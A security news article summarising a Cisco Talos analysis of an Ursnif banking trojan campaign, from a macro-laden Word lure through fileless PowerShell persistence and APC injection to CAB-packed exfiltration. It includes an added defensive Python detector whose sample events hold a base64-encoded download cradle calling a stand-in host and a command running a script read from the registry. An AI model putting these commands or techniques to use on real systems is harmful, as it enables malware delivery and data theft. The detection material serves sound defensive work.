- A new Ursnif banking trojan campaign uses PowerShell to achieve fileless persistence and avoid detection.
- The campaign was discovered by security researchers at Cisco Talos.
- The attackers use a malicious Microsoft Word document containing a malicious VBA macro to spread the malware.
Security researchers have discovered a new Ursnif malware campaign using PowerShell to avoid detection.
The campaign was discovered by security researchers at Cisco Talos, who said that the attackers use PowerShell to achieve fileless persistence and so evade anti-malware solutions.
The attackers use a malicious Microsoft Word document containing a malicious VBA macro to deliver the malware.
If macros are already allowed, the macro is executed automatically through the AutoOpen function; otherwise the document displays an image asking the user to enable macros.
The macro is designed to execute the next infection stage by accessing the AlternativeText property of the Shapes object “j6h1cf.”
“The value of this property is the malicious PowerShell command, which is subsequently executed by the Shell function. The PowerShell command is base64 encoded, and is another PowerShell command that downloads Ursnif.”
After Ursnif is executed, a registry entry is created containing the commands for the next stage of execution.
The next command uses the Windows Management Instrumentation Command-line (WMIC) to launch PowerShell, which extracts the value of the Authicap key and executes it.
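A defender-side check for the process chain described above (Word spawning PowerShell, then WMIC spawning PowerShell that executes a script read from a registry value), written as an added example that is not part of the Talos analysis or this article. The Sysmon-style process-creation events and the registry path are constructed; only the Authicap value name comes from the text.

```python
import base64
import re

# Constructed Sysmon-style process-creation events (not real telemetry); the
# registry path is a placeholder, only the Authicap value name is from the report.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc "
                    + base64.b64encode(CRADLE.encode("utf-16le")).decode()},
    {"ParentImage": r"C:\Windows\System32\wbem\WMIC.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoP -w hidden iex (gp HKCU:\Software\PLACEHOLDER_PATH).Authicap"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(ev):
    """Return the reasons a process-creation event matches the delivery/persistence chain."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if image != "powershell.exe":
        return reasons
    if parent in ("winword.exe", "excel.exe"):
        reasons.append("office-spawned-powershell")      # macro stage
    if parent == "wmic.exe":
        reasons.append("wmic-spawned-powershell")        # persistence stage
    decoded = decode_encoded_command(ev["CommandLine"])
    script = decoded if decoded is not None else ev["CommandLine"]
    if decoded is not None:
        reasons.append("encoded-command")
    if re.search(r"(?i)\b(iex|invoke-expression)\b", script) and \
       re.search(r"(?i)\bhk(cu|lm)\b|get-itemproperty|\bgp\b", script):
        reasons.append("registry-stored-script-execution")  # script body read from a registry value
    if re.search(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b", script):
        reasons.append("download-cradle")
    return reasons
```

Running `analyze_event` over real Sysmon Event ID 1 records gives the same three signals; a benign script launched from Explorer produces none.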
The injection process starts by allocating memory for the malicious DLL with VirtualAllocEx, targeting the current process. It then copies the malicious DLL into the newly allocated memory with Copy.
Next, QueueUserAPC is called to create a user-mode APC and queue it within the thread.
“To execute the malicious DLL from the APC queue, the thread needs to enter an alertable state. SleepEx is used to trigger an alertable state completing the APC injection, by specifying 1 (True) for its second parameter which is bAlertable,” the researchers said in their blog post.
Once the infection process is complete, C2 requests are made via HTTPS. The researchers were able to intercept the traffic and found that the data was packaged into a CAB file before exfiltration.
For more details and indicators of compromise (IOC), you can visit the analysis by Cisco Talos researchers here.